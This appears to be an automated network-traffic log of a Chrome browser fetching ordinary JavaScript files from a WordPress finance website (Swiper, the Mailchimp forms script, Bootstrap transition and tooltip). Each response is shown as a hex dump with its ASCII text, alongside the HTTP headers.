                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 74 65 22 2c 48 2c 21 30 29 2c 72 5b 64 5d 28 22 6c 6f 61 64 22 2c 65 2e 6f 6e 4c 6f 61 64 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 7d 2c 58 3d 28 65 2c 74 29 3d 3e 65 2e 67 72 69 64 26 26 74 2e 67 72 69 64 26 26 74 2e 67 72 69 64 2e 72 6f 77 73 3e 31 3b 76 61 72 20 42 3d 7b 69 6e 69 74 3a 21 30 2c 64 69 72 65 63 74 69 6f 6e 3a 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 6f 6e 65 57 61 79 4d 6f 76 65 6d 65 6e 74 3a 21 31 2c 73 77 69 70 65 72 45 6c 65 6d 65 6e 74 4e 6f 64 65 4e 61 6d 65 3a 22 53 57 49 50 45 52 2d 43 4f 4e 54 41 49 4e 45 52 22 2c 74 6f 75 63 68 45 76 65 6e 74 73 54 61 72 67 65 74 3a 22 77 72 61 70 70 65 72 22 2c 69 6e 69 74 69 61 6c 53 6c 69 64 65 3a 30 2c 73 70 65 65 64 3a 33 30 30 2c 63 73 73 4d 6f 64 65 3a 21 31 2c 75 70 64 61 74 65 4f 6e 57
                                                                                                                                                                                                                                                                        Data Ascii: te",H,!0),r[d]("load",e.onLoad,{capture:!0})},X=(e,t)=>e.grid&&t.grid&&t.grid.rows>1;var B={init:!0,direction:"horizontal",oneWayMovement:!1,swiperElementNodeName:"SWIPER-CONTAINER",touchEventsTarget:"wrapper",initialSlide:0,speed:300,cssMode:!1,updateOnW
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 73 3a 21 30 2c 6c 6f 6f 70 41 64 64 69 74 69 6f 6e 61 6c 53 6c 69 64 65 73 3a 30 2c 6c 6f 6f 70 50 72 65 76 65 6e 74 73 53 6c 69 64 69 6e 67 3a 21 30 2c 72 65 77 69 6e 64 3a 21 31 2c 61 6c 6c 6f 77 53 6c 69 64 65 50 72 65 76 3a 21 30 2c 61 6c 6c 6f 77 53 6c 69 64 65 4e 65 78 74 3a 21 30 2c 73 77 69 70 65 48 61 6e 64 6c 65 72 3a 6e 75 6c 6c 2c 6e 6f 53 77 69 70 69 6e 67 3a 21 30 2c 6e 6f 53 77 69 70 69 6e 67 43 6c 61 73 73 3a 22 73 77 69 70 65 72 2d 6e 6f 2d 73 77 69 70 69 6e 67 22 2c 6e 6f 53 77 69 70 69 6e 67 53 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 70 61 73 73 69 76 65 4c 69 73 74 65 6e 65 72 73 3a 21 30 2c 6d 61 78 42 61 63 6b 66 61 63 65 48 69 64 64 65 6e 53 6c 69 64 65 73 3a 31 30 2c 63 6f 6e 74 61 69 6e 65 72 4d 6f 64 69 66 69 65 72 43 6c 61 73 73
                                                                                                                                                                                                                                                                        Data Ascii: s:!0,loopAdditionalSlides:0,loopPreventsSliding:!0,rewind:!1,allowSlidePrev:!0,allowSlideNext:!0,swipeHandler:null,noSwiping:!0,noSwipingClass:"swiper-no-swiping",noSwipingSelector:null,passiveListeners:!0,maxBackfaceHiddenSlides:10,containerModifierClass


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        99192.168.2.449857141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC601OUTGET /wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-19a8"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147815
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1158c24350-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC877INData Raw: 31 39 61 38 0d 0a 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 39 38 38 35 3a 65 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 7b 7d 7d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3d 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3f 3f 5b 5d 2c 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 29 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3d 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3f 3f 5b 5d 2c 74 68 69 73 2e 6c 69
                                                                                                                                                                                                                                                                        Data Ascii: 19a8(()=>{var e={9885:e=>{function t(){this.listeners={}}t.prototype.emit=function(e,t){this.listeners[e]=this.listeners[e]??[],this.listeners[e].forEach((e=>e.apply(null,t)))},t.prototype.on=function(e,t){this.listeners[e]=this.listeners[e]??[],this.li
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 6f 5b 65 5d 29 3e 2d 31 7c 7c 69 2e 69 6e 64 65 78 4f 66 28 22 2a 22 29 3e 2d 31 26 26 6f 5b 65 5d 2e 6c 65 6e 67 74 68 3e 30 3b 65 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 74 3f 73 3f 22 22 3a 22 6e 6f 6e 65 22 3a 73 3f 22 6e 6f 6e 65 22 3a 22 22 3b 63 6f 6e 73 74 20 61 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 22 29 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 61 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 28 73 7c 7c 74 29 26 26 61 5b 65 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 61 73 2d 72 65 71 75 69 72 65 64 22 29 26 26 28 61 5b 65 5d 2e 72 65 71 75 69 72 65 64 3d 21 30 2c 61 5b 65 5d 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 61 74
                                                                                                                                                                                                                                                                        Data Ascii: o[e])>-1||i.indexOf("*")>-1&&o[e].length>0;e.style.display=t?s?"":"none":s?"none":"";const a=e.querySelectorAll("input,select,textarea");for(let e=0;e<a.length;e++)(s||t)&&a[e].getAttribute("data-was-required")&&(a[e].required=!0,a[e].removeAttribute("dat
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6d 63 34 77 70 2d 72 65 73 70 6f 6e 73 65 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 74 52 65 73 70 6f 6e 73 65 28 22 22 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6d 63 34 77 70 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 22 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 73 65 74 28 29 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 39 36 38 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 6e 28 36 39 34 32 29 2c 69 3d 5b 5d 2c 6f 3d 6e 65 77 28 6e 28 39 38 38 35 29 29 3b 66
                                                                                                                                                                                                                                                                        Data Ascii: ement.querySelector(".mc4wp-response").innerHTML=e},o.prototype.reset=function(){this.setResponse(""),this.element.querySelector(".mc4wp-form-fields").style.display="",this.element.reset()},e.exports=o},9685:(e,t,n)=>{const r=n(6942),i=[],o=new(n(9885));f
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 6c 21 3d 3d 28 69 3d 6e 2e 65 78 65 63 28 65 29 29 3b 29 74 2e 70 75 73 68 28 69 5b 31 5d 29 3b 72 65 74 75 72 6e 20 74 7d 28 74 29 2c 6e 29 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 65 5b 74 5d 3b 6f 3f 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6f 29 7c 7c 28 65 5b 74 5d 3d 5b 6f 5d 29 2c 65 5b 74 5d 2e 70 75 73 68 28 6e 29 29 3a 65 5b 74 5d 3d 6e 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 6e 2e 72 65 70 6c 61 63 65 28 2f 28 5c 72 29 3f 5c 6e 2f 67 2c 22 5c 72 5c 6e 22 29 2c 6e 3d 28 6e 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 65 2b 28 65 3f 22 26 22 3a 22 22 29 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d
                                                                                                                                                                                                                                                                        Data Ascii: l!==(i=n.exec(e));)t.push(i[1]);return t}(t),n);else{var o=e[t];o?(Array.isArray(o)||(e[t]=[o]),e[t].push(n)):e[t]=n}return e}function s(e,t,n){return n=n.replace(/(\r)?\n/g,"\r\n"),n=(n=encodeURIComponent(n)).replace(/%20/g,"+"),e+(e?"&":"")+encodeURICom
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 2b 3d 22 5b 5d 22 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 29 7b 65 28 74 2c 73 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 7d 63 6f 6e 73 74 20 61 3d 74 2e 65 6c 65 6d 65 6e 74 73 2e 6e 61 6d 65 64 49 74 65 6d 28 6f 29 3b 69 66 28 21 61 29 63 6f 6e 74 69 6e 75 65 3b 63 6f 6e 73 74 20 63 3d 61 2e 74 79 70 65 7c 7c 61 5b 30 5d 2e 74 79 70 65 3b 73 77 69 74 63 68 28 63 29 7b 64 65 66 61 75 6c 74 3a 61 2e 76 61 6c 75 65 3d 73 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 61 64 69 6f 22 3a 63 61 73 65 22 63 68 65 63 6b 62 6f 78 22 3a 7b 63 6f 6e 73 74 20 65 3d 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 41 72 72 61 79 3f 73 3a 5b 73 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 61 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 61 5b 74 5d
                                                                                                                                                                                                                                                                        Data Ascii: +="[]";else if("object"==typeof s){e(t,s,o);continue}const a=t.elements.namedItem(o);if(!a)continue;const c=a.type||a[0].type;switch(c){default:a.value=s;break;case"radio":case"checkbox":{const e=s.constructor===Array?s:[s];for(let t=0;t<a.length;t++)a[t]
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC223INData Raw: 7d 29 29 2c 6f 28 22 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 69 2e 67 65 74 42 79 45 6c 65 6d 65 6e 74 28 65 2e 74 61 72 67 65 74 29 3b 69 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 2c 5b 74 2c 65 5d 29 7d 29 29 2c 72 2e 6c 69 73 74 65 6e 65 72 73 26 26 28 5b 5d 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 72 2e 6c 69 73 74 65 6e 65 72 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 6f 6e 28 65 2e 65 76 65 6e 74 2c 65 2e 63 61 6c 6c 62 61 63 6b 29 7d 29 29 2c 64 65 6c 65 74 65 20 72 2e 6c 69 73 74 65 6e 65 72 73 29 2c 72 2e 66 6f 72 6d 73 3d 69 2c 77 69 6e 64 6f 77 2e 6d 63 34 77 70 3d 72 7d 29 28 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: })),o("change",(function(e){const t=i.getByElement(e.target);i.trigger("change",[t,e])})),r.listeners&&([].forEach.call(r.listeners,(function(e){i.on(e.event,e.callback)})),delete r.listeners),r.forms=i,window.mc4wp=r})()
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        100192.168.2.449858141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC843OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.transition.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-2e4"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147815
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1279c78c8a-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC747INData Raw: 32 65 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 66 6e 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 3d 21 31 2c 72 3d 74 68 69 73 3b 6e 28 74 68 69 73 29 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 3d 21 30 7d 29 3b 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 7c 7c 6e 28 72 29 2e 74 72 69 67 67 65 72 28 6e 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 2e 65 6e 64 29 7d 2c 74 29 2c 74 68 69 73 7d 2c 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: 2e4!function(n){"use strict";n.fn.emulateTransitionEnd=function(t){var i=!1,r=this;n(this).one("bsTransitionEnd",function(){i=!0});return setTimeout(function(){i||n(r).trigger(n.support.transition.end)},t),this},n(function(){n.support.transition=functio
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        101192.168.2.449859141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC840OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.tooltip.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-2a6d"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147815
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba146bf143d4-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC877INData Raw: 32 61 36 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 5b 22 73 61 6e 69 74 69 7a 65 22 2c 22 77 68 69 74 65 4c 69 73 74 22 2c 22 73 61 6e 69 74 69 7a 65 46 6e 22 5d 2c 69 3d 5b 22 62 61 63 6b 67 72 6f 75 6e 64 22 2c 22 63 69 74 65 22 2c 22 68 72 65 66 22 2c 22 69 74 65 6d 74 79 70 65 22 2c 22 6c 6f 6e 67 64 65 73 63 22 2c 22 70 6f 73 74 65 72 22 2c 22 73 72 63 22 2c 22 78 6c 69 6e 6b 3a 68 72 65 66 22 5d 2c 6f 3d 7b 22 2a 22 3a 5b 22 63 6c 61 73 73 22 2c 22 64 69 72 22 2c 22 69 64 22 2c 22 6c 61 6e 67 22 2c 22 72 6f 6c 65 22 2c 2f 5e 61 72 69 61 2d 5b 5c 77 2d 5d 2a 24 2f 69 5d 2c 61 3a 5b 22 74 61 72 67 65 74 22 2c 22 68 72 65 66 22 2c 22 74 69 74 6c 65 22 2c 22 72 65 6c 22 5d 2c 61 72 65 61 3a
                                                                                                                                                                                                                                                                        Data Ascii: 2a6d!function(t){"use strict";var e=["sanitize","whiteList","sanitizeFn"],i=["background","cite","href","itemtype","longdesc","poster","src","xlink:href"],o={"*":["class","dir","id","lang","role",/^aria-[\w-]*$/i],a:["target","href","title","rel"],area:
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 45 78 70 7d 29 2c 6c 3d 30 2c 70 3d 61 2e 6c 65 6e 67 74 68 3b 6c 3c 70 3b 6c 2b 2b 29 69 66 28 72 2e 6d 61 74 63 68 28 61 5b 6c 5d 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 69 2c 6f 29 7b 69 66 28 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 3b 69 66 28 6f 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6f 29 72 65 74 75 72 6e 20 6f 28 65 29 3b 69 66 28 21 64 6f 63 75 6d 65 6e 74 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 7c 7c 21 64 6f 63 75 6d 65 6e 74 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 63 72 65 61 74 65 48 54 4d 4c 44 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69
                                                                                                                                                                                                                                                                        Data Ascii: Exp}),l=0,p=a.length;l<p;l++)if(r.match(a[l]))return!0;return!1}function a(e,i,o){if(0===e.length)return e;if(o&&"function"==typeof o)return o(e);if(!document.implementation||!document.implementation.createHTMLDocument)return e;var n=document.implementati
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 74 2e 69 73 46 75 6e 63 74 69 6f 6e 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 29 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 2e 63 61 6c 6c 28 74 68 69 73 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 29 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 2e 73 65 6c 65 63 74 6f 72 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 29 2c 74 68 69 73 2e 69 6e 53 74 61 74 65 3d 7b 63 6c 69 63 6b 3a 21 31 2c 68 6f 76 65 72 3a 21 31 2c 66 6f 63 75 73 3a 21 31 7d 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 69 6e 73 74 61 6e 63 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 65 6c 65 63 74 6f 72 29 74 68 72
                                                                                                                                                                                                                                                                        Data Ascii: t.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)thr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 26 26 74 2e 65 61 63 68 28 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 69 5b 74 5d 21 3d 6f 26 26 28 65 5b 74 5d 3d 6f 29 7d 29 2c 65 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3f 65 3a 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2e 64 61 74 61 28 22 62 73 2e 22 2b 74 68 69 73 2e 74 79 70 65 29 3b 69 66 28 69 7c 7c 28 69 3d 6e 65 77 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 74 68 69 73 2e 67 65 74 44 65 6c 65 67 61 74 65 4f 70 74
                                                                                                                                                                                                                                                                        Data Ascii: ;return this._options&&t.each(this._options,function(t,o){i[t]!=o&&(e[t]=o)}),e},l.prototype.enter=function(e){var i=e instanceof this.constructor?e:t(e.currentTarget).data("bs."+this.type);if(i||(i=new this.constructor(e.currentTarget,this.getDelegateOpt
